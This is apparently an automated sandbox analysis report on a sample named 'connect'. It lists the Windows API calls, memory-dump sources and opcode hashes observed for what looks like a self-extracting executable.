                                                            • GetFileAttributesW.KERNELBASE(00000000,?,?,?,00402FA6,?,?), ref: 004037F9
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: FileTime$AttributesSystemlstrlen
                                                            • String ID:
                                                            • API String ID: 692046673-0
                                                            • Opcode ID: 1fb4c1fadb55e38d2c1500d5aa9543c4b1b068a8c282553e5afd7018cff06221
                                                            • Instruction ID: a2b1e01e5b72138805d62356ac959b95482304870badc63da705cab1a7889ccf
                                                            • Opcode Fuzzy Hash: 1fb4c1fadb55e38d2c1500d5aa9543c4b1b068a8c282553e5afd7018cff06221
                                                            • Instruction Fuzzy Hash: 17411C76600206AADB20BF65C841AB77BECDF40755F50807BFD45A71C1E778CF424298
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlenA.KERNEL32(00000000,?,00404AC4,?,?,?,?,00000000,00000000,?,?,00000000,?), ref: 00404EF7
                                                            • lstrlenA.KERNEL32(?,?,00404AC4,?,?,?,?,00000000,00000000,?,?,00000000,?), ref: 00404EFF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: lstrlen
                                                            • String ID: x86
                                                            • API String ID: 1659193697-2105985432
                                                            • Opcode ID: c89c420ea53d7f28fbbc756a3206f21fb611187062e3faeb5e7255374ed344f4
                                                            • Instruction ID: 6bccced163320fcf1cb440c06350a2799d348d6a0af59ce35538f100fea6a6f2
                                                            • Opcode Fuzzy Hash: c89c420ea53d7f28fbbc756a3206f21fb611187062e3faeb5e7255374ed344f4
                                                            • Instruction Fuzzy Hash: 834152B1D0425A9FDB10DF69CC44BEFBBB8EF84344F04406AE804B7241E679DA45CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 0041EA16
                                                            • GetFileType.KERNELBASE(00000000), ref: 0041EA28
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: FileHandleType
                                                            • String ID:
                                                            • API String ID: 3000768030-0
                                                            • Opcode ID: b0fe165af819a37977b178bd6eec3e707dd721edbb7711092b6a98fe0bbd2afd
                                                            • Instruction ID: cea22e441615bec5daae5f6553f6f7952348c1caf38601312ab32f3b90ae0697
                                                            • Opcode Fuzzy Hash: b0fe165af819a37977b178bd6eec3e707dd721edbb7711092b6a98fe0bbd2afd
                                                            • Instruction Fuzzy Hash: E711E47951475146C7308A3F8CC86A37A94BF523B0B380B2BD8B7C66F1C339D8C29259
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • Sleep.KERNEL32(00000014), ref: 00402CE8
                                                            • EndDialog.USER32(00000000,00000000), ref: 00402D45
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: DialogSleep
                                                            • String ID:
                                                            • API String ID: 2355613043-0
                                                            • Opcode ID: 7f281faf9ff11317ac50cd5bfdd93bb10e10a750ba57f70053ff6e923c83a31f
                                                            • Instruction ID: de90bda738dd8f93423cadb678a4f0ee15bcde19803547acaeefca108c5f98f6
                                                            • Opcode Fuzzy Hash: 7f281faf9ff11317ac50cd5bfdd93bb10e10a750ba57f70053ff6e923c83a31f
                                                            • Instruction Fuzzy Hash: DD018F32201210DFD7748B16DF0DA677769FB40761B5552BAE905AB6F0C3B8DC41CBA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041A472
                                                              • Part of subcall function 0041795F: RaiseException.KERNEL32(?,?,?,0041A494,?,?,?,?,?,?,?,?,0041A494,0040126C,0042DD74,0040126C), ref: 004179BF
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041A48F
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                            • String ID:
                                                            • API String ID: 3476068407-0
                                                            • Opcode ID: 6f896675ea5a4229c775ed26ef5a70175bd572cd42ac93d04ac4af3c57f2676e
                                                            • Instruction ID: 081aea13a5b5c2fcaccb962a289a0b86b797665bc5a11ef07633e85e67f7219a
                                                            • Opcode Fuzzy Hash: 6f896675ea5a4229c775ed26ef5a70175bd572cd42ac93d04ac4af3c57f2676e
                                                            • Instruction Fuzzy Hash: BBF0BB7081020D768B00B6B5E81A9DE777C5900328B50463BF924911D2EF7CABE985DE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0041026F
                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 0041027C
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: 2efc49608cd209d455171f2259a8696bcd3c8d09b9499b5a434c9c919b460d80
                                                            • Instruction ID: 913b5487961dc4f27969f4ef1a158cbc8a7cfa6adf5552ced201f2c87a827e7c
                                                            • Opcode Fuzzy Hash: 2efc49608cd209d455171f2259a8696bcd3c8d09b9499b5a434c9c919b460d80
                                                            • Instruction Fuzzy Hash: D5F05E75504218EBDF10DF69D804ADB7BE8EF09320B1181A6F816972A0D6319D91EBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • KiUserCallbackDispatcher.NTDLL(00000010), ref: 00407C87
                                                            • GetSystemMetrics.USER32(00000011), ref: 00407C99
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: CallbackDispatcherMetricsSystemUser
                                                            • String ID:
                                                            • API String ID: 365337688-0
                                                            • Opcode ID: dab63846cfb170731ee332e31864d88563b48c721149afb7b82a279b86ef9fc6
                                                            • Instruction ID: fda715761b55cd12d4bb332e0bd589d22bbdfe991fcdc7ffda579dec28641cd2
                                                            • Opcode Fuzzy Hash: dab63846cfb170731ee332e31864d88563b48c721149afb7b82a279b86ef9fc6
                                                            • Instruction Fuzzy Hash: A1F01DB0A04603DFC794CF39E905685BBF1BB48315745963BD519C2A90E7B4A0A58F84
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 03e9815ff0cc55ae9e01d1c5953ff4ec33af36563b86ba8af3f575059eda026e
                                                            • Instruction ID: 1425e2ae4f3325e7f5982e63cde3def45c25729aa66a1b70728b6a0e8332262f
                                                            • Opcode Fuzzy Hash: 03e9815ff0cc55ae9e01d1c5953ff4ec33af36563b86ba8af3f575059eda026e
                                                            • Instruction Fuzzy Hash: F8123A71A00209DFCB14DFA9C884AAEB7B5FF48314F24416AE905BB391DB35AD41CF98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 0040C9FE
                                                              • Part of subcall function 0040DB6A: __EH_prolog.LIBCMT ref: 0040DB6F
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 00ffca02ed19d82a8f0dd54cd17f2d332fe1e17e30c4331b8228106880939162
                                                            • Instruction ID: ded04732b7ca7f7bedce2c2e0f5075f28382ec03d4c412607ab088f34e023be7
                                                            • Opcode Fuzzy Hash: 00ffca02ed19d82a8f0dd54cd17f2d332fe1e17e30c4331b8228106880939162
                                                            • Instruction Fuzzy Hash: AD412C3170161ADFCB25DFA4C884F9AB7B8BF04704F04426AE909A7251DB34ED55CF94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0041D85D: RtlAllocateHeap.NTDLL(00000008,0040126C,00000000,?,0041D5F7,00000001,00000364,00000006,000000FF,?,0041CFC8,0041DFEF,?,?,0041990C,?), ref: 0041D89E
                                                            • _free.LIBCMT ref: 00420089
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap_free
                                                            • String ID:
                                                            • API String ID: 614378929-0
                                                            • Opcode ID: b7413877cbfda83a37a5655c88cf64e534879104b46e028407b95268035cc8d8
                                                            • Instruction ID: 4fc720d3896346cfaf47cae79bd076c044a769ef3a5438def9c2e83076ea658f
                                                            • Opcode Fuzzy Hash: b7413877cbfda83a37a5655c88cf64e534879104b46e028407b95268035cc8d8
                                                            • Instruction Fuzzy Hash: 2F012B726003049BE3318F55A841A5BFBD9FB85370F65051EE59443281E634A845C76C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000008,0040126C,00000000,?,0041D5F7,00000001,00000364,00000006,000000FF,?,0041CFC8,0041DFEF,?,?,0041990C,?), ref: 0041D89E
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 1db8dc718e8040e0b58127918f862e7fc54dc06279a56f0965c2560c4143d894
                                                            • Instruction ID: ca8c9f84f2627c8059d5a4d0ae20a873f78265cafbf5dd0b61adb93daf4d30c9
                                                            • Opcode Fuzzy Hash: 1db8dc718e8040e0b58127918f862e7fc54dc06279a56f0965c2560c4143d894
                                                            • Instruction Fuzzy Hash: 0BF0E072E44520AADB217B268C45FDB7748BF417B0B144177F82996698CE2CDC8186FC
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SetFileAttributesW.KERNELBASE(?,?), ref: 004032A8
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: fddba1c115b818bc94c5485435f841ec90c9dbfd8bdc5c7c25a963fdd6413526
                                                            • Instruction ID: 938116e0337dc1b4ebe23af26a4cc00a08dbdfa04c6e7bcda7d87b55809bb478
                                                            • Opcode Fuzzy Hash: fddba1c115b818bc94c5485435f841ec90c9dbfd8bdc5c7c25a963fdd6413526
                                                            • Instruction Fuzzy Hash: 68F049312007049BDB24DFA5C848B57B7E8BF08306F00496EE88796AA0D378F984CB58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,0041990C,?,?,004114AF,00000008,?,00407C5D,?,00401253,?,0040126C), ref: 0041DFDE
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SetEnvironmentVariableW.KERNELBASE(?,?,?), ref: 0040635F
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentVariable
                                                            • String ID:
                                                            • API String ID: 1431749950-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 004100DC: CloseHandle.KERNEL32(?,?,00410106,?,?,004101AE,?,80000000,?,?,?,?,00410204,?,?,00000003), ref: 004100E6
                                                            • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,?,004101AE,?,80000000,?,?,?), ref: 0041011D
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateFileHandle
                                                            • String ID:
                                                            • API String ID: 3498533004-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • WriteFile.KERNELBASE(?,?,00000001,00000001,00000000,?,0041035C,?,00000001,00000000,?,?,00000000,?,?,00410704), ref: 004103A2
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID:
                                                            • API String ID: 3934441357-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0041021E
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SetFileTime.KERNELBASE(?,?,?,?,?,00410312,00000000,00000000,?,?,0040328B,?), ref: 00410324
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: FileTime
                                                            • String ID:
                                                            • API String ID: 1425588814-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID:
                                                            • API String ID: 1452528299-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,?,0040F259,?), ref: 0040F283
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,0040F267,?), ref: 0040F29E
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: FreeVirtual
                                                            • String ID:
                                                            • API String ID: 1263568516-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetLastError.KERNEL32 ref: 00404227
                                                            • wsprintfW.USER32 ref: 00404238
                                                            • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00404247
                                                            • GetLastError.KERNEL32 ref: 00404252
                                                            • GetEnvironmentVariableW.KERNEL32(?,00000000,0000002D), ref: 0040427C
                                                            • GetLastError.KERNEL32 ref: 00404287
                                                            • lstrcmpiW.KERNEL32(00000000,00000000), ref: 00404299
                                                            • SetLastError.KERNEL32(00401877), ref: 004042CD
                                                            • lstrlenA.KERNEL32(00426DB8), ref: 00404303
                                                            • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00404352
                                                            • MultiByteToWideChar.KERNEL32(000004E4,00000000,00426DB8,00000001,00000000,00000002), ref: 00404388
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$EnvironmentVariable$ByteCharInfoLocaleMultiWidelstrcmpilstrlenwsprintf
                                                            • String ID: SfxString%d
                                                            • API String ID: 1827968993-944934635
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00404C25
                                                            • FindResourceExA.KERNEL32(00000000,?,?), ref: 00404C42
                                                            • FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00404C56
                                                            • SizeofResource.KERNEL32(00000000,00000000), ref: 00404C67
                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 00404C71
                                                            • LockResource.KERNEL32(00000000), ref: 00404C7C
                                                            • GetProcAddress.KERNEL32(SetProcessPreferredUILanguages), ref: 00404CA8
